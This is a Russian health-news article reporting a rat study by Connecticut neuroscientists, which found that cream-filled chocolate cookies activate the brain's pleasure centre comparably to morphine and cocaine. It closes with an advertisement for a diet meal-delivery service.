Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сладкое печенье вызывает ...  >>  Сладкое печенье вызывает такую же зависимость, как кокаин

Обратная связь

Сладкое печенье вызывает такую же зависимость, как кокаин

Размер шрифта
16 декабря 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Нейрофизиологи из Коннектикута выяснили, что ваше любимое лакомство в известном смысле очень напоминает тяжелые наркотики.

Сладкое печенье вызывает такую же зависимость, как кокаин

Ученые задались целью выяснить, могут ли продукты с высоким содержанием жира и/или сахара вызывать физическую зависимость. Научную группу возглавил профессор Джозеф Шредер. Объектом исследования стали лабораторные крысы.

Выяснилось, что самое банальное шоколадное печенье с кремовой начинкой стимулирует центр удовольствия столь же эффективно, как морфин или кокаин! При этом число активированных нейронов оказалось даже больше, чем в случае тяжелых наркотиков.

«Наша работа добавляет цемента в фундамент теории о зависимости, вызываемой высокоуглеводными и жирными продуктами», – заявляет Шредер. «Эта теория объясняет, почему некоторые люди не могут побороть гастрономическое искушение, несмотря на то что, знают о потенциальном вреде».

Суть исследования заключалась в следующем. Крысы помещались в лабиринт, в одном из закутков которого лежало шоколадное печенье, а в другом – плошка с рисовой кашей. («Крысы, так же как и люди, не испытывают особо бурных чувств относительно этого простого блюда», – поясняет Шредер). Животным предоставлялась полная свобода выбора: они могли выбрать  абсолютно любой участок лабиринта. Далее ученые измеряли количество времени, проведенного крысами в «сладком» закутке. Разумеется, оказалось, что крысы значительно чаще забегали именно в этот участок лабиринта.

Что интересно, животные в первую очередь съедали кремовую начинку, лишь потом отдавая должное самому печенью.

Аналогичный эксперимент был проведен на другой группе животных. Разница заключалась в том, что вместо риса и печенья крыс «соблазняли» инъекциями. В одном участке лабиринта им вкалывали морфин или кокаин, в другом – обычный физраствор. Вполне закономерно, что последний не слишком-то прельщал грызунов, и они большую часть времени проводили в противоположном углу лабиринта.

Сравнивая временные показатели этих двух экспериментов, ученые пришли к выводу, что печенье и тяжелые наркотики вызывают у крыс сопоставимую зависимость.

Далее с помощью иммуногистохимических методов исследователи измерили уровень экспрессии особого белка (он называется c-Fos), который является маркером активности нервных клеток в «центре удовольствия» головного мозга.

Выяснилось, что шоколадное печенье активировало значительно большее количество нейронов, чем морфин и кокаин!

«Таким образом, результаты, полученные в ходе наблюдения за животными, подтвердились лабораторными данными», – говорит Шредер.

Так что, безусловно признавая значимость проблемы наркомании, мы не должны забывать, что не менее сильные наркотики продаются абсолютно легально, и они тоже очень опасны для нашего здоровья.

Не будьте наркоманом! Специально для вас создана «Диета Елены Малышевой». Уже готовая правильная еда будет доставлена в любое удобное для вас место и время! Вам останется только есть и худеть!

• google_analytics: false